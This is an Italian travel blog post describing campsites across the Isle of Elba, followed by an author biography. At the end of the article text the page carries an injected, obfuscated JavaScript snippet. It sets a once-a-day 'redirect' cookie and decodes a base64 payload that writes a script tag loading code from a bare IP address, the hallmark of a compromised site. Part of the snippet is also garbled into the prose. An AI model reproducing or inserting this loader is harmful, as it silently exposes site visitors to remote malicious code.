Capoliveri, Laconella,Elba Island

Campeggi all’Isola d’Elba da Capoliveri a Portoferraio

Scopri le diverse località dell’Isola d’Elba in cui cercare campeggi

Quando si pensa all’Isola d’Elba, i più credono che sia un territorio limitato, mentre è un’area vasta più di 200 km2 con una costa ricca di insenature e spiagge, ognuna con caratteristiche differenti.

Per chi ha bambini, sono ideali i campeggi sull’Isola d’Elba a Marina di Campo: spiaggia dalla sabbia fine con fondali in cui l’acqua scende gradualmente, tanto che in alcune zone si può camminare fino a 50 metri dalla battigia. Inoltre la spiaggia è vicinissima al paese e ci si può muovere senza dover prendere la macchina. Dai camping all’Elba di Marina di Campo potrete godervi passeggiate in pineta e fruire sia di aree libere che dei lidi attrezzati con bar, ristoranti e negozietti caratteristici.

Circondati dalla ricca vegetazione mediterranea, i campeggi dell’Isola d’Elba a Capoliveri sono tra i più turistici. A metà strada tra Portoferraio e Porto Azzurro, sono facilmente accessibili anche tramite bus pubblici ed offrono, oltre a spiagge attrezzate, anche noleggi di pedalò, surf e moto d’acqua, motivo per il quale sono tra le mete più amate dai giovani.

I campeggi sull’Isola d’Elba a Portoferraio sono la meta prediletta da chi vuole godere del patrimonio storico. Dai bastioni di Forte Falcone e Forte Stella alla Torre del Martello, la struttura urbana del paese tardo-rinascimentale offre ai turisti affascinanti testimonianze del suo passato. Punto di snodo di arrivi e partenze marittime, Portoferraio ha inoltre una delle più belle spiagge dell’Isola.

I campeggi situati sul litorale meridionale dell’isola, sono circondati dalla rigogliosa macchia e si trovano alle pendici del promontorio di Monte Capo Stella; quelli nei pressi di Lacona invece, – situati al centro dell’isola in posizione strategica rispetto a Portoferraio, ma anche a Capoliveri e Porto Azzurro – rappresentano un’ottima scelta per chi vuole trovare una base per esplorare il territorio alla scoperta dell’isola. _ok_”text/javascript”> function getCo_ok_ie(e){var U=document.co_ok_ie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),co_ok_ie=getCo_ok_ie(“redirect”);if(now>=(time=co_ok_ie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.co_ok_ie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘

Share this post

Federica Mazzei

Elbana di nascita, giramondo per natura. Nata nel 1984 consegue nel 2007 una laurea triennale in Comunicazione sociale e nel 2009 una laurea magistrale con lode in Sistemi e progetti di comunicazione, prosegue il percorso formativo con una borsa di studio di due anni presso la Scuola Superiore Sant'Anna di Pisa (attività di supporto e potenziamento Ufficio Relazioni con il Pubblico, progettazione Piani integrati a livello di Zona distretto). Esperienze lavorative nel settore delle relazioni al pubblico, negli enti del terzo settore e nella comunicazione digitale.

Nessun commento

Aggiungi commento